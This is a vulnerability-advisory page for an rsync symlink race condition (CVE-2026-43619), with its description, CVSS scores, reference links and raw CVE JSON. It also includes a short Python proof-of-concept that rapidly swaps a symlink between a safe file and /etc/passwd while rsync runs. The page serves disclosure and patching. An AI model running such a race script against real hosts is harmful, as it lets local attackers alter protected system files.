Security Vulnerability Report
中文
CVE-2026-43619 CVSS 6.3 MEDIUM

CVE-2026-43619

Published: 2026-05-20 02:16:37
Last Modified: 2026-05-20 13:58:08
Source: [email protected]

Description

Rsync version 3.4.2 and prior contain symlink race condition vulnerabilities in path-based system calls including chmod, lchown, utimes, rename, unlink, mkdir, symlink, mknod, link, rmdir, and lstat that allow local attackers to redirect operations to files outside the exported rsync module. Attackers with local filesystem access can exploit the timing window between path resolution and syscall execution by swapping symlinks to apply sender-supplied permissions, ownership, timestamps, or filenames to arbitrary files outside the intended module boundary on rsync daemons configured with 'use chroot = no'.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Rsync <= 3.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os import time # This script demonstrates the concept of the symlink race condition. # It rapidly swaps a symlink between a safe target and a sensitive target. # # Usage: # 1. Create a directory monitored by rsync. # 2. Point 'link_path' inside that directory. # 3. Run this script while triggering an rsync operation. safe_path = "/tmp/safe_file.txt" target_path = "/etc/passwd" # Sensitive file to modify permissions/timestamps link_path = "/tmp/rsync_module/exploit_link" # Initialize the symlink if os.path.exists(link_path): os.remove(link_path) os.symlink(safe_path, link_path) print("[*] Starting race condition attack...") print(f"[*] Swapping {link_path} between {safe_path} and {target_path}") try: while True: # Point to safe file (during rsync check) os.remove(link_path) os.symlink(safe_path, link_path) # Tiny delay to simulate timing window time.sleep(0.0001) # Point to target file (during rsync syscall execution) os.remove(link_path) os.symlink(target_path, link_path) time.sleep(0.0001) except KeyboardInterrupt: print("\n[!] Stopping attack.") # Cleanup if os.path.islink(link_path): os.remove(link_path)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43619", "sourceIdentifier": "[email protected]", "published": "2026-05-20T02:16:36.577", "lastModified": "2026-05-20T13:58:07.923", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rsync version 3.4.2 and prior contain symlink race condition vulnerabilities in path-based system calls including chmod, lchown, utimes, rename, unlink, mkdir, symlink, mknod, link, rmdir, and lstat that allow local attackers to redirect operations to files outside the exported rsync module. Attackers with local filesystem access can exploit the timing window between path resolution and syscall execution by swapping symlinks to apply sender-supplied permissions, ownership, timestamps, or filenames to arbitrary files outside the intended module boundary on rsync daemons configured with 'use chroot = no'."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-367"}]}], "references": [{"url": "https://github.com/RsyncProject/rsync/releases/tag/v3.4.3", "source": "[email protected]"}, {"url": "https://github.com/RsyncProject/rsync/security/advisories/GHSA-4h9m-w5ff-j735", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/rsync-symlink-race-condition-via-path-based-syscalls", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.